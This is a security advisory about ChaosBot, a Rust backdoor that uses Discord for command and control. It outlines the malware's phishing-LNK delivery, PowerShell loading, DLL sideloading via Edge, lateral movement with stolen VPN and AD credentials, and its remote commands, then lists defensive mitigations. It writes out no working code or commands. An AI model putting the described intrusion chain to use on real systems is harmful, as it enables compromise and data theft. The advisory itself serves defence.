A recently discovered Rust-based malware called ChaosBot is being used compromise computers via Discord channels. Review the details within this Cybersecurity Threat Advisory to learn more and see how to protect your system.
What is the threat?
ChaosBot is a Rust-based backdoor that uses Discord as its command-and-control (C2) channel, allowing threat actors to issue remote instructions and conduct reconnaissance on compromised Windows hosts. It spreads via phishing emails that deliver malicious LNK files, which trigger PowerShell to download and launch ChaosBot. A DLL is sideloaded through the Microsoft Edge binary (identity_helper.exe). The attackers leverage VPN and Active Directory (AD) credentials to move laterally and maintain access, using evasion techniques to avoid detection.
Why is this noteworthy?
ChaosBot’s use of Discord for C2 and its naming convention—linked to the operators’ Discord handles (chaos_00019 and lovebb0024) demonstrate a novel level of stealth. The campaign combines LNK phishing, PowerShell payloads, decoy PDFs, and DLL sideloading via Edge to enable reconnaissance and rapid footholds. Additionally, potential backdoors like Visual Studio Code Tunnel suggest a multi-layered access strategy.
Some supported commands are:
- Shell: Executes shell commands via PowerShell
- SCR: Captures screenshots
- Download: Transfers data to the victim’s device
- Upload: Adds a file to the Discord group
What is exposure or risk?
The risks center on rapid initial access via LNK phishing, lateral movement through compromised VPNs and over-privileged AD accounts, and persistent, stealthy operations enabled by FRP/reverse-proxy techniques. The malware’s remote-control capabilities (shell, file transfer, screen capture) heighten data exposure and operational disruption, with additional ransomware variants (Chaos-C++) increasing the threat. Enterprises, especially financial services, face credential theft, extended persistence, and regulatory/compliance impacts; mitigations include strict credential hygiene, network segmentation, and monitoring for unusual Discord activity and remote-execution abuse.
What are the recommendations?
Barracuda recommends the following mitigating actions to secure your systems from the ChaosBot malware:
- Strengthen phishing defenses (spam filtering, DMARC, SPF, DKIM) and train users to recognize LNK attachments and decoy PDFs.
- Block or restrict the execution of Windows shortcuts (LNK) from email and network shares.
- Deploy and tune Endpoint Detection and Response (EDR) to detect PowerShell abuse, script-based execution, WMI activity, and DLL sideloading.
- Enforce the least privilege for AD accounts; remediate over-privileged roles.
- Require MFA for VPN access and critical services; rotate credentials regularly.
- Monitor for credential theft indicators and unusual VPN or AD activity.
References
For more in-depth information about the recommendations, please visit the following links:
- https://thehackernews.com/2025/10/new-rust-based-malware-chaosbot-hijacks.html
- https://radar.offseq.com/threat/new-rust-based-malware-chaosbot-uses-discord-chann-515129af
- https://www.news4hackers.com/chaosbot-new-rust-based-malware-uses-discord-channels-to-access-victims-pcs/
- https://www.techjuice.pk/new-rust-based-malware-chaosbot-uses-discord-channels-to-hijack-pcs/
If you have any questions about this Cybersecurity Threat Advisory, don’t hesitate to get in touch with Barracuda Managed XDR’s Security Operations Center.
This post originally appeared on Smarter MSP.